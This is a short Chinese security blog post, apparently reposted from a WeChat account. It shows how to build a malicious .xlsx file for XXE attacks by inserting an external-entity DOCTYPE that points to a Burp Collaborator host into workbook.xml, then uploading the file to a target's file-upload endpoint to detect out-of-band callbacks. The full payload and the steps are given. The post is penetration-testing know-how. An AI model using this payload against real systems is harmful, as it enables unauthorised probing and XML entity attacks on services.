利用Excle打XXE

admin 2024年5月15日00:08:36评论15 views字数 728阅读2分25秒阅读模式

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送,建议大家把猫鼠信安设为星标”,否则可能看不到了

Excle打XXE

Microsoft Office从2007版本开始引入了一种名为Office Open XML(OOXML)的文件格式。这个格式基于ZIP文件格式,并且包含了许多XML文件来描述工作簿数据、元数据和文档信息。

我们创建一个excle,并解压

xl/drawings/drawing1.xml
xl/worksheets/sheet1.xml
xl/worksheets/_rels/sheet1.xml.rels
xl/sharedStrings.xml
xl/styles.xml
xl/workbook.xml
xl/_rels/workbook.xml.rels
_rels/.rels
[Content_Types].xml

利用Excle打XXE
需要修改workbook.xml文件,以下内容插入第2行和第3行,SYSTEM后面自己添加相对应的dns记录均可,我习惯使用burp的collaborator模块

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://gtdwmy7gvrncy5rvfu11kxzl2c82wr.burpcollaborator.net/"> ]>
<x>&xxe;</x>

添加好后重新打包成excle的后缀,如xxe.xlsx
此时恶意文件就做好了,找到对应的文件上传的接口,直接上传excle文件,观察dns是否有记录

点击下方名片关注公众号

原文始发于微信公众号(猫鼠信安):利用Excle打XXE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月15日00:08:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用Excle打XXEhttps://cn-sec.com/archives/2056155.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息